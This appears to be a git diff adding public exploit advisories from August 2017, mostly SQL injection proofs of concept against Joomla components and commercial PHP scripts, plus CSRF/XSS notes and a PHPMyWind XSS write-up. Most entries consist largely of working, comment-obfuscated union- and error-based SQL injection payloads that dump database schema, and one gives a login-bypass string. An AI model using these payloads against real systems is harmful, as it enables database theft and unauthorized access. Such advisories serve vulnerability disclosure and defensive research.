using above attacker supplied link. You can now access the vulnerable +application using same PHPSESSID session cookie from another browser. + + +CVE-2017-12970 (CSRF) + +Add user + +
+ + + +
+ +HTTP Response: +"The account PWNU was sucesfully created" + +Create password + +
+ + + + + + +
+ +HTTP Response: +"The account PWNU was sucesfully updated" + + +Delete users + +
+ + + +
+ +HTTP Response: +"The account PWNU was sucesfully deleted" + + +CVE-2017-12971 (XSS) + +
+ + + +
+ + +HTTP Response example: +"PHPSESSID=HACKED123" + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: "No longer being maintained" +August 21, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/42524.txt b/platforms/php/webapps/42524.txt new file mode 100755 index 000000000..1b2f4ef9a --- /dev/null +++ b/platforms/php/webapps/42524.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Flip Wall 8.0 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://pulseextensions.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/flip-wall/ +# Demo: http://demo.pulseextensions.com/flip-wall-component-demo/ +# Version: 8.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_flipwall&task=click&wallid=[SQL] +# +# 811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/42525.txt b/platforms/php/webapps/42525.txt new file mode 100755 index 000000000..e6290b289 --- /dev/null +++ b/platforms/php/webapps/42525.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Sponsor Wall 8.0 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://pulseextensions.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/ +# Demo: http://demo.pulseextensions.com/sponsor-wall-component-demo/ +# Version: 8.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL] +# +# 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/42526.txt b/platforms/php/webapps/42526.txt new file mode 100755 index 000000000..5e10fcd72 --- /dev/null +++ b/platforms/php/webapps/42526.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: PHP Classifieds Script 5.6.2 SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: https://scriptoffice.com/ +# Software Link: https://soft.scriptoffice.com/projects/classifiedscript/wiki/Main_Menu +# Demo: http://www.classifieddemo.com/ +# Version: 5.6.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/[SQL]/ +# +# http://localhost/[PATH]/category/[SQL]/ +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42527.txt b/platforms/php/webapps/42527.txt new file mode 100755 index 000000000..7d02bfc06 --- /dev/null +++ b/platforms/php/webapps/42527.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Affiliate Niche Script 3.4.0 SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: https://scriptoffice.com/ +# Software Link: https://soft.scriptoffice.com/projects/affiliatenichescript/wiki/Main_Menu +# Demo: http://demodesigns.affiliatenichescript.com/ +# Version: 3.4.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/default_blue/Appliances/Categories/[SQL]/ +# +# 1'+uNiOn+sElEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283929,0x28313029,0x28313129,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229+--+-/ +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42528.txt b/platforms/php/webapps/42528.txt new file mode 100755 index 000000000..c7c1efe5c --- /dev/null +++ b/platforms/php/webapps/42528.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://www.couponscript.com/ +# Software Link: http://www.couponscript.com/ +# Demo: http://www.couponscript.com/demo/ +# Version: 6.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?page=cat&cid=[SQL] +# +# 34'+/*!00000Procedure*/+/*!00000Analyse*/+(extractvalue(0,/*!00000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+- +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42529.txt b/platforms/php/webapps/42529.txt new file mode 100755 index 000000000..ff82c77ca --- /dev/null +++ b/platforms/php/webapps/42529.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: iTech Social Networking Script 3.08 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://itechscripts.com/ +# Software Link: http://itechscripts.com/social-networking-script/ +# Demo: http://social.itechscripts.com +# Version: 3.08 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows the users to inject sql commands ... +# +# Proof of Concept: +# +# http://localhost/[PATH]/timeline.php?token=[SQL] +# +# -5458c74d97b01eae257e44aa9d5bade97baf'++uNiOn+sElEct+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629+--+- +# +# http://localhost/[PATH]/photos_of_you.php?token=[SQL] +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42530.txt b/platforms/php/webapps/42530.txt new file mode 100755 index 000000000..03b5e34c5 --- /dev/null +++ b/platforms/php/webapps/42530.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Joomla! Component FocalPoint Pro / Free v1.2.3 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://focalpointx.com/ +# Software Link: http://focalpointx.com/demos/focalpoint-pro +# Demo: http://focalpointx.com/demos/focalpoint-free/ +# Demo: http://focalpointx.com/demos/focalpoint-pro +# Version: 1.2.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_focalpoint&view=location&id=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42531.txt b/platforms/php/webapps/42531.txt new file mode 100755 index 000000000..d52f8d34d --- /dev/null +++ b/platforms/php/webapps/42531.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: https://codecanyon.net/user/bousague +# Software Link: https://codecanyon.net/item/bitcoindogecoin-mining-php-script/20315581 +# Demo: http://test.z-files.site/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to access the user panel and administration panel ... +# +# Proof of Concept: +# +# http://localhost/[PATH]/ +# http://localhost/[PATH]/admincqqq +# User: anything Pass: 'or 1=1 or ''=' +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42532.txt b/platforms/php/webapps/42532.txt new file mode 100755 index 000000000..762b98603 --- /dev/null +++ b/platforms/php/webapps/42532.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component Ajax Quiz 1.8 - SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://webkul.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ajaxquiz/ +# Demo: http://joomla30.webkul.com/ajaxquiz/ +# Version: 1.8 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_ajaxquiz&view=ajaxquiz&cid=[SQL] +# +# 60+union+select+(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42533.txt b/platforms/php/webapps/42533.txt new file mode 100755 index 000000000..7289c8dc7 --- /dev/null +++ b/platforms/php/webapps/42533.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: PHP-Lance 1.52 - 'subcat' Parameter SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://www.scriptdemo.com/ +# Software Link: http://www.scriptdemo.com/details/phplance/ +# Demo: http://www.scriptdemo.com/php-lance/ +# Version: 1.52 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/show.php?catid=1&subcat=[SQL] +# +# -1'+unIon(SELEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283929,0x28313029)--+- +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42534.txt b/platforms/php/webapps/42534.txt new file mode 100755 index 000000000..3412989da --- /dev/null +++ b/platforms/php/webapps/42534.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection +# Dork: N/A +# Date: 21.08.2017 +# Vendor Homepage: http://www.scriptdemo.com/ +# Software Link: http://www.scriptdemo.com/details/phpjokesite2/ +# Demo: http://www.scriptdemo.com/php-jokesite/ver2.0/ +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/print.php?joke_id=[SQL] +# +# -230'+unIon(SELEct+0x283129,0x283229,0x3c68313e494853414e2053454e43414e3c2f68313e,0x283429,0x283529,(/*!00000SeLect*/(@x)/*!00000fRom*/(/*!00000select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!00000select*/(0)/*!00000from*/(information_schema.columns)/*!00000where*/(table_schema=database())and(0x00)in(@x:=/*!00000CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!00000CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+- +# +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42535.txt b/platforms/php/webapps/42535.txt new file mode 100755 index 000000000..adc386093 --- /dev/null +++ b/platforms/php/webapps/42535.txt @@ -0,0 +1,68 @@ +Exploit Title:PHPMyWind 5.3 has XSS +Exploit Author:小雨 +Vendor Homepage:http://phpmywind.com +Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip +Version:5.3 +CVE:CVE-2017-12984 + + +$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`"); + $orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1)); + $nickname= htmlspecialchars($nickname);//游客(xxx) + $contact= htmlspecialchars($contact); //联系方式 + $content= htmlspecialchars($content); //留言内容 + + $posttime= GetMkTime(time()); + $ip= gethostbyname($_SERVER['REMOTE_ADDR']); + + + $sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')"; + if($dosql->ExecNoneQuery($sql)) + { + ShowMsg('留言成功,感谢您的支持!','message.php'); + exit(); + } + } +可以看出使用htmlspecialchars进行过滤,带入库中. +跟进content参数。 +127.0.0.1/PHPMyWind_5.3/admin/ message_update.php + + + + + +修改留言 + + + + + + + +GetOne("SELECT * FROM `#@__message` WHERE `id`=$id"); +?> +
修改留言 刷新
+
+ + + + + + + + + + + +
用户名:
联系方式:
留言内容: +